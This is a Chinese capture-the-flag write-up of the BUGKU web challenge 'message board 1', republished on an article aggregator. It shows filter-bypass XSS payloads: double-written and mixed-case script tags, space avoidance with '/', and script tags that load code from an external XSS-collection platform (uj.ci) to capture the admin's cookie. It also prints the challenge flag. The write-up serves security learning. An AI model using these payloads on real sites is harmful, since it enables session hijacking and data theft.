BUGKU-WEB 留言板1

这篇具有很好参考价值的文章主要介绍了BUGKU-WEB 留言板1。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

题目描述

题目截图如下:

BUGKU-WEB 留言板1,# BUGKU,BUGKU

进入场景看看:
BUGKU-WEB 留言板1,# BUGKU,BUGKU

解题思路

  • 之间写过一题类似的,所以这题应该是有什么不同的
  • 那就按照之前的思路进行测试试试
  • 提示说:需要xss平台接收flag,这个和之前说的提示一样

相关工具

  • xss平台:https://xssaq.com
  • 对xss的一些绕过进行学习了解

解题步骤

  1. 输入测试一下script代码:
<script>alert(1)</script>

发现script被过滤了,script被替换为空。参考:str_replace()函数:将字符串中的指定字符替换为其他字符
BUGKU-WEB 留言板1,# BUGKU,BUGKU
2. 换个大小写的试试:

<ScRipt>ALeRt(XSS);</sCRipT>

BUGKU-WEB 留言板1,# BUGKU,BUGKU
还是被过滤了!,大小写绕过!

  1. 使用双写试试
<scscriptript>alert('z')</scscriptript>

解释:将中间的script替换为空,剩下的结合后又是script可以成功绕过。

BUGKU-WEB 留言板1,# BUGKU,BUGKU
所以确定了过滤方式之后,找个xss平台(https://xssaq.com)测试一下:
BUGKU-WEB 留言板1,# BUGKU,BUGKU
之后测试其中的代码,始终没有反应:
极限短码(好像不行):

<scsCRiPtript/SrC=//uj.ci/qoe>

这个好像可以正常:

<scsCRiPtript/sRC=//uj.ci/v9o></scsCRiPtript>

然后在评论区发现,管理员说xss平台需要http模式的…
BUGKU-WEB 留言板1,# BUGKU,BUGKU
然后我找了半天没有找到这个http的平台,但是当我再次看这个平台的时候,哦豁出来又!也就是说https其实也可以,只是比较慢而已?
BUGKU-WEB 留言板1,# BUGKU,BUGKU

PS:除了会大小绕过之外,其实还会对空格进行绕过。所以需要注意我们的测试代码中没有空格或者使用·/·,来绕过对空格的限制。

BUGKU-WEB 留言板1,# BUGKU,BUGKU

得到Flag

flag{772af954ed340063c935a60d92093504}

BUGKU-WEB 留言板1,# BUGKU,BUGKU

新知识点

  • XSS篇——XSS过滤绕过技巧

BUGKU-WEB 留言板1,# BUGKU,BUGKU

  • xss各种姿势的学习(包含绕过)和个人重要总结

BUGKU-WEB 留言板1,# BUGKU,BUGKU
对此,需要重点学习一下!

有用的话,请点赞收藏评论,帮助更多的同学哦文章来源地址https://www.toymoban.com/news/detail-833438.html

到了这里,关于BUGKU-WEB 留言板1的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 个人博客留言板功能实现

    因为这个博客是用的大佬的开源项目,我也是用自己的想法改了很多东西,虽然可能写的不是很好,但是我自己想要的效果实现了,开源项目不就是用来学习的嘛,所以不能一层不变,之前首页改版、评论功能我都没有写文章,这次抽空更新了留言板功能,来水一篇文章。

    2024年02月08日
    浏览(16)
  • JSP实验:实现留言板功能,显示留言者和留言内容

    form.jsp为登录界面、为账号密码创建JavaBean、doForm.jsp(无界面)为登录处理,假定正确的用户名为admin,口令为123,用户输入正确则重定向到messageBoard.jsp(留言板页面),进行留言。错误则返回到登录界面。showMessage.jsp实现留言展示功能,展示留言者、留言标题、留言内容。 u

    2024年02月03日
    浏览(10)
  • 【JavaEEj进阶】 Spring实现留言板

    可以发布并显示 显示后实现输入框的清除 并且再次刷新后,不会清除下面的缓存 这里由于博主主要从事后端相关工作,这里就不做过多讲解了 相关知识点可以参考博主写的【JavaEE初阶】 JavaScript相应的WebAPI中表白墙的书写 如果有看不懂的地方也可以找博主,博主也略知一二

    2024年01月19日
    浏览(17)
  • Flask狼书笔记 | 07_留言板

    这是一个简单的程序,涉及到的大部分是之前所学习到的基础知识。新涉及的python包: BootStrap-Flask , Flask-Moment , Faker , Flask-Debug Toolbar 。 Git : 将大量代码放到 app.py 一个文件里,代码的管理会不太方便,可读性也差。本节将使用一种新的代码结构 导入配置 :可以从pyt

    2024年02月09日
    浏览(14)
  • JS——利用JS实现简易留言板

    文章目录 前言 一 、 成果图 二、使用步骤 1. 需求解析 2. HTML结构 3.CSS样式 4.JS行为 总结   实现留言板的基本功能 提交留言—— 用户输入留言(当输入内容为空时,提示用户,且不可提交留言),输入完成后点击提交留言,留言列表中将会出现对应用户输入的内容,且留言

    2024年02月11日
    浏览(20)
  • 基于Flask的留言板的设计与实现

    这是《Flask Web开发实战:入门、进阶与原理解析》这本书中的一个小项目,我在学习后根据书中的教程实现了留言板的功能,并结合我的思路将代码做了一些调整。 下面这是实现后的展示图片 留言板得有一个表单提供昵称以及留言的输入功能,在数据库保存的数据应该包括(

    2024年02月01日
    浏览(15)
  • JavaScript Array对象(属性、方法) 留言板案例

    一、创建数组对象的方式 var arrOb=new Array(值,........) var arrOb=Array(值,.......) var arrOb= [ 值,.........] var arrOb=new Array(n); arrOb [ 0]=值1; arrOb [ 1]=值2; 二、数组的属性 length      //数组中元素的数目 三、数组的方法 1、转为字符串 2、 join(\\\'连接符\\\')         将数组元素连接成字符串   

    2024年02月06日
    浏览(12)
  • HTML+PHP+MYSQL实现一个简单的留言板

    提示:这里可以添加系列文章的所有文章的目录,目录需要自己手动添加 大家好,下面将为大家展示 基于HTML PHP MYSQL的留言板的设计与实现过程,适合初学者点击观看,以下我将会以笔者自称! 提示:写完文章后,目录可以自动生成,如何生成可参考右边的帮助文档 提示:

    2024年02月04日
    浏览(19)
  • 使用Spring+SpringMVC+Mybatis实现留言板的增删改查

    目的 1)掌握使用maven来创建SSM项目 2)掌握web.xml和pom.xml的使用 3)掌握Spring、SpringMVC和Mybatis,学会整合SSM 4)掌握的controller层注解@Autowired,@RequestMapping和@RequestParam的使用 5)用学会配置SpringMVC.xml、applicationContext.xml和mybatis-config.xml等配置文件 6)掌握spring+springMVC+mybatis 对于留言板

    2024年02月04日
    浏览(38)
  • 数据安全与网络安全——基于php+MySql实现简易留言板(附全资料 超级详细!)

    这篇文章是基于PHP和MySQL实现的一个简易留言板。该留言板具有用户注册、登录、发表留言以及查看留言等功能。首先,用户可以通过注册功能创建自己的账号,然后使用该账号进行登录。登录成功后,用户可以发表留言,并且可以查看自己和其他用户发表的留言。在留言的

    2024年02月04日
    浏览(17)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包